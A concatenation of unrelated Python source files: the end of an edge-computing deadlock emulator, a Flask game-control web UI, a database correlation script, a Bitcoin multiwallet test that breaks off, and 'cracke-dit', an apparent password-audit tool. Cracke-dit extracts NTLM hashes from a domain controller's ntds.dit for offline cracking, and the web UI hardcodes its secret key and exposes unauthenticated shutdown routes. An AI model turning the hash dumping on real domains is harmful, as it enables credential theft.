os.system(cmd)
send_result(hosts['osboxes-0'], list_result)
send_email(result)
stop += 1
'''
for i in thread_record:
i.join()
'''
_client.loop_stop()
time.sleep(1)
print('done')
os.system('kill -9 {}'.format(os.getpid()))
def start_loop():
global _loc
global tasks
global t_time
global node_id
global stop
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
_threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
for i in _threads_:
Thread(target=i).daemon = True
Thread(target=i).start()
time.sleep(2)
send_message('client') # send mec details to clients
x = gp.getpass('Press any key to Start...').lower()
if x != 'exit':
print('========= Waiting for tasks ==========')
_time_ = dt.datetime.now()
while True:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
list_seq = get_exec_seq(edf())
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.5)
now = dt.datetime.now()
delta = now - _time_
if delta > dt.timedelta(minutes=3):
print('terminating programme 3 mins elapsed')
save_and_abort()
break
except KeyboardInterrupt:
print('\nProgramme Terminated')
save_and_abort()
break
def speaking_node():
global mec_no
while True:
if len(hosts) > (mec_no - 1):
send_message('update')
mec_no = len(hosts) + 1
time.sleep(2)
def initialization():
global mec_no
global host_ip
global cloud_ip
host_ip = ip_address()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
print('Broker IP: ', s.getsockname()[0])
try:
mec_no = int(input('Number of MECs: ').strip())
cloud_ip = input('Cloud Server IP: ').strip()
print('\nCompiling MEC Details')
h1 = Thread(target=receive_message)
h2 = Thread(target=receive_offloaded_task_mec)
h1.daemon = True
h2.daemon = True
h1.start()
h2.start()
time.sleep(1.5)
while True:
b = input('Send Hello Message (Y/N): ').strip().lower()
if b == 'y':
send_message('hello')
break
else:
print('\nPlease Type "y" to send Hello message\n')
except KeyboardInterrupt:
print('\nProgramme Terminated')
exit(0)
def main():
global algo
os.system('clear')
print('mec ip: ', ip_address())
algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
run_me()
if __name__ == "__main__":
main()
|
cracke-dit.py | import sys, glob, os, argparse, itertools, time
from threading import Thread, Event
import ntds_parser as ntds, outputs
from database import HashDatabase, DomainDoesntExist
BANNER = """\033[91m
__ ___ __
______________ ______/ /_____ ____/ (_) /_
/ ___/ ___/ __ `/ ___/ //_/ _ \______/ __ / / __/
/ /__/ / / /_/ / /__/ ,< / __/_____/ /_/ / / /_
\___/_/ \__,_/\___/_/|_|\___/ \033[90mv1.1\033[0m\033[91m \__,_/_/\__/
\033[0m@darkp0rt\n"""
if __name__ == "__main__":
print(BANNER)
available_outputs = ", ".join(outputs.discover_outputs().keys())
parser = argparse.ArgumentParser(add_help=False, description="crack-dit makes it easier to perform password "
"audits against Windows-based corporate environments.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("--database-name", default="db.json", action="store", help="Name of the database file to store")
parser.add_argument("--help", action="store_true", help="show this help message and exit", required=False)
group = parser.add_argument_group("1. Cracking", "cracke-dit can take your raw ntds.dit and SYSTEM hive "
"and turn them in to a user:hash file for cracking "
"within your favourite password cracker")
group.add_argument("--system", action="store", help="(local) SYSTEM hive to parse")
group.add_argument("--ntds", action="store", help="(local) ntds.dit file to parse")
group.add_argument("--username", action="store", help="(remote) Domain Admin username to connect to the target")
group.add_argument("--password", action="store", help="(remote) Domain Admin username to connect to the target")
group.add_argument("--target", action="store", help="(remote) IP address of the Domain Contoller to connect to")
group.add_argument("--out", action="store", help="File to write user:hash to")
group.add_argument("--no-history", action="store_false", dest="historic", default=True,
help="Set to disable historic password processing. Will speed up significantly.")
group = parser.add_argument_group("2. Reporting", "use these options to process a hash:password file from "
"your favourite password cracker")
group.add_argument("--pot", action="store", help="Your .pot file in hash:password format.")
group.add_argument("--domain", action="store", help="Full domain FQDN, i.e. acme.local.")
group.add_argument("--only-enabled", action="store_true", dest="only_enabled", default=False,
help="Only show passwords for enabled accounts.")
group.add_argument("--only-users", action="store_true", dest="only_users", default=False,
help="Only show user accounts, i.e. ignore computer accounts.")
group.add_argument("--output", action="store", default="stdout",
help="Output module to visualise the data: %s " % available_outputs)
args, unknown_args = parser.parse_known_args()
args = outputs.get_output_by_name(args.output).add_args(parser)
local = (args.system and args.ntds)
remote = (args.username and args.password and args.target)
if local or remote:
domain, records = ntds.process_local(args.system, args.ntds, args.historic) if local else ntds.process_remote(args.username, args.password, args.target, args.historic)
ntlm_file = args.out or "{0}.hashes.ntlm".format(domain)
with HashDatabase(args.database_name, domain, raise_if_table_doesnt_exist=False) as db:
with open(ntlm_file, "w+") as out:
for record in records:
out.write("%s:%s%s" % (record["username"], record["ntlmhash"], os.linesep))
db.insert(record)
print("Found {} hashes for '{}', available at {}. Run them through your favourite password cracker and re-run cracke-dit with --pot - see README for tips!".format(len(records), domain, ntlm_file))
elif args.pot and args.domain:
def __update(stopper):
spinner = itertools.cycle(['-', '/', '|', '\\'])
while not stopper.is_set():
sys.stdout.write("[" + next(spinner) + "] Processing... \r")
sys.stdout.flush()
time.sleep(0.2)
def __opendb(domain):
with HashDatabase(args.database_name, domain, raise_if_table_doesnt_exist=True, only_enabled=args.only_enabled, only_users=args.only_users) as db:
try:
with open(args.pot, "r") as pot:
for line in pot:
line = line.rstrip("\r\n").replace("$NT$", "") # $NT$ for John
hash, password = map(str.strip, line.split(":"))
if password:
db.update_hash_password(hash, password)
outputs.get_output_by_name(args.output).run(db, args)
except IOError:
print("Failed to read '{}'. Make sure the file exists and is readable.".format(args.pot))
print("Did you mean: {}?".format(", ".join(glob.glob("*.pot"))))
stopper = Event()
spinner = Thread(target=__update, args=(stopper,))
spinner.start()
try:
__opendb(args.domain)
except DomainDoesntExist as e:
print(e.message)
print("Did you mean: {}?".format(", ".join(e.tables[1:])))
finally:
stopper.set()
spinner.join()
else:
parser.print_help()
|
plot-time-difference.py | """
file: plot-time-difference.py
brief: Initial attempt at doing event correlation on a table.
author: S. V. Paulauskas
date: February 22, 2019
"""
import keyring
import psycopg2
import pandas as pd
import threading
import time
import yaml
import sys
def chunk_data_frame(frame, n):
df_len = len(frame)
chunk_size = int(len(frame) / n)
count = 0
dfs = []
while True:
if count > df_len - 1:
break
start = count
count += chunk_size
dfs.append(frame.iloc[start: count])
return dfs
def run(conn, frame):
cursor = connection.cursor()
start = time.time()
print(threading.current_thread().name, '- Generating statement list.')
statement = ''
for row in frame.itertuples():
statement += cursor.mogrify(
"insert into gated select id, energy, time from data where time between %s and %s and id>3;",
(str(row[1] - 126), str(row[1] - 63))).decode()
print(threading.currentThread().name, 'Finished generating statement list in ', time.time() - start, 'seconds.')
start = time.time()
print(threading.current_thread().name, '- Executing many.')
cursor.execute(statement)
print(threading.current_thread().name, '- Finished executing many in ', time.time() - start, 'seconds.')
if __name__ == '__main__':
with open(sys.argv[1]) as f:
cfg = yaml.safe_load(f)
try:
connection = psycopg2.connect(user=cfg['username'], password=keyring.get_password(cfg['host'], cfg['username']),
host=cfg['host'], port=cfg['port'], database=cfg['db'])
cursor = connection.cursor()
cursor.execute('select time from id00;')
triggers = pd.DataFrame.from_dict(cursor.fetchall())
threads = []
num_threads = cfg['numThreads']
framechunks = chunk_data_frame(triggers, num_threads)
start = time.time()
for i in range(0, num_threads):
t = threading.Thread(target=run, args=(connection, framechunks[i]))
threads.append(t)
t.start()
for thread in threads:
thread.join()
print('Main Thread - Executed in ', (time.time() - start)/60, " minutes.")
except psycopg2.Error as ex:
print("Error connecting to db.", ex)
|
webui.py | from multiprocessing import Queue, Manager, Process
from time import sleep
from flask import Flask, render_template, request, redirect, url_for, flash
from time import sleep
from wtforms import Form, SelectField, SelectMultipleField, BooleanField, widgets, FieldList
from os import system
import common, colors
import json
import yaml
class MultiCheckboxField(SelectMultipleField):
"""
A multiple-select, except displays a list of checkboxes.
Iterating the field will produce subfields, allowing custom rendering of
the enclosed checkbox fields.
"""
widget = widgets.ListWidget(prefix_label=True)
option_widget = widgets.CheckboxInput()
class SettingsForm(Form):
move_can_be_admin = BooleanField('Allow Move to change settings')
play_instructions = BooleanField('Play instructions before game start')
play_audio = BooleanField('Play audio')
red_on_kill = SelectField('Kill notification',choices=[(True,'Red'),('','Dark')],coerce=bool)
sensitivity = SelectField('Move sensitivity',choices=[(0,'Ultra High'),(1,'High'),(2,'Medium'),(3,'Low'),(4,'Ultra Low')],coerce=int)
mode_options = [ game for game in common.Games if game not in [common.Games.Random, common.Games.JoustTeams]]
random_modes = MultiCheckboxField('Random Modes',choices=[(game.name, game.pretty_name) for game in mode_options])
color_lock = BooleanField('Lock team colors')
color_choices = [(color.name,color.name) for color in colors.team_color_list]
color_lock_choices = FieldList(SelectField('',choices=color_choices,coerce=str),min_entries=9)
random_teams = BooleanField('Randomize teams each round')
class WebUI():
def __init__(self, command_queue=Queue(), ns=None):
self.app = Flask(__name__)
self.app.secret_key="MAGFest is a donut"
self.command_queue = command_queue
if ns == None:
self.ns = Manager().Namespace()
self.ns.status = dict()
self.ns.settings = {
'sensitivity':1,
'red_on_kill':False,
'color_lock_choices':{
2: ['Magenta','Green'],
3: ['Orange','Turquoise','Purple'],
4: ['Yellow','Green','Blue','Purple']
}}
self.ns.battery_status = dict()
else:
self.ns = ns
self.app.add_url_rule('/','index',self.index)
self.app.add_url_rule('/changemode','change_mode',self.change_mode)
self.app.add_url_rule('/startgame','start_game',self.start_game)
self.app.add_url_rule('/killgame','kill_game',self.kill_game)
self.app.add_url_rule('/updateStatus','update',self.update)
self.app.add_url_rule('/battery','battery_status',self.battery_status)
self.app.add_url_rule('/settings','settings',self.settings, methods=['GET','POST'])
self.app.add_url_rule('/rand<num_teams>','randomize',self.randomize_teams)
self.app.add_url_rule('/power','power',self.power)
self.app.add_url_rule('/reboot8675309','reboot',self.reboot)
self.app.add_url_rule('/shutdown8675309','shutdown',self.shutdown)
self.app.add_url_rule('/shutdown','shutdown_lastscreen',self.shutdown_lastscreen)
def web_loop(self):
self.app.run(host='0.0.0.0', port=80, debug=False)
def web_loop_with_debug(self):
self.app.run(host='0.0.0.0', port=80, debug=True)
#@app.route('/')
def index(self):
return render_template('joustmania.html')
#@app.route('/updateStatus')
def update(self):
return json.dumps(self.ns.status)
#@app.route('/changemode')
def change_mode(self):
self.command_queue.put({'command': 'changemode'})
return "{'status':'OK'}"
#@app.route('/startgame')
def start_game(self):
self.command_queue.put({'command': 'startgame'})
return "{'status':'OK'}"
#@app.route('/killgame')
def kill_game(self):
self.command_queue.put({'command': 'killgame'})
return "{'status':'OK'}"
#@app.route('/battery')
def battery_status(self):
return render_template('battery.html',ns=self.ns,levels=common.battery_levels)
#@app.route('/power')
def power(self):
return render_template('power.html')
#@app.route('/shutdown8675309')
def shutdown(self):
Process(target=self.shutdown_proc).start()
#use redirect to conceal the url for tripping the shutdown
return redirect(url_for('shutdown_lastscreen'))
def shutdown_proc(self):
sleep(2)
system('shutdown now')
#@app.route('/shutdown_lastscreen')
def shutdown_lastscreen(self):
return render_template('shutdown.html')
#@app.route('/reboot8675309')
def reboot(self):
Process(target=self.reboot_proc).start()
return redirect(url_for('index'))
def reboot_proc(self):
sleep(2)
system('reboot now')
#@app.route('/settings')
def settings(self):
if request.method == 'POST':
new_settings = SettingsForm(request.form).data
self.web_settings_update(new_settings)
return redirect(url_for('settings'))
else:
temp_colors = self.ns.settings['color_lock_choices']
temp_colors = temp_colors[2] + temp_colors[3] + temp_colors[4]
settingsForm = SettingsForm(
sensitivity = self.ns.settings['sensitivity'],
red_on_kill = self.ns.settings['red_on_kill'],
color_lock_choices = temp_colors
)
return render_template('settings.html', form=settingsForm, settings=self.ns.settings)
def web_settings_update(self,web_settings):
colors_are_good = True
temp_colors = {
2: web_settings['color_lock_choices'][0:2],
3: web_settings['color_lock_choices'][2:5],
4: web_settings['color_lock_choices'][5:9],
}
for key in temp_colors.keys():
colorset = temp_colors[key]
if len(colorset) != len(set(colorset)):
temp_colors[key] = self.ns.settings['color_lock_choices'][key]
colors_are_good = False
temp_settings = self.ns.settings
temp_settings.update(web_settings)
temp_settings['color_lock_choices'] = temp_colors
#secret setting, keep it True
#temp_settings['enforce_minimum'] = 'enforce_minimum' in web_settings.keys()
if temp_settings['random_modes'] == []:
temp_settings['random_modes'] = [common.Games.JoustFFA.name]
self.ns.settings = temp_settings
with open(common.SETTINGSFILE,'w') as yaml_file:
yaml.dump(self.ns.settings,yaml_file)
if colors_are_good:
flash('Settings updated!')
else:
flash('Duplicate color lock colors! Other settings saved.')
#@app.route('/rand<num_teams>')
def randomize_teams(self,num_teams):
if num_teams not in '234':
return "what are you doing here?"
else:
num_teams = int(num_teams)
team_colors = colors.generate_team_colors(num_teams)
team_colors = [color.name for color in team_colors]
return str(team_colors).replace("'",'"')#JSON is dumb and demands double quotes
def start_web(command_queue, ns):
webui = WebUI(command_queue,ns)
webui.web_loop()
if __name__ == '__main__':
webui = WebUI()
webui.web_loop_with_debug()
|
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
for _ in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Too many levels of symbolic links', 'Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another particld?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another particld?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w2"),
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w1"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
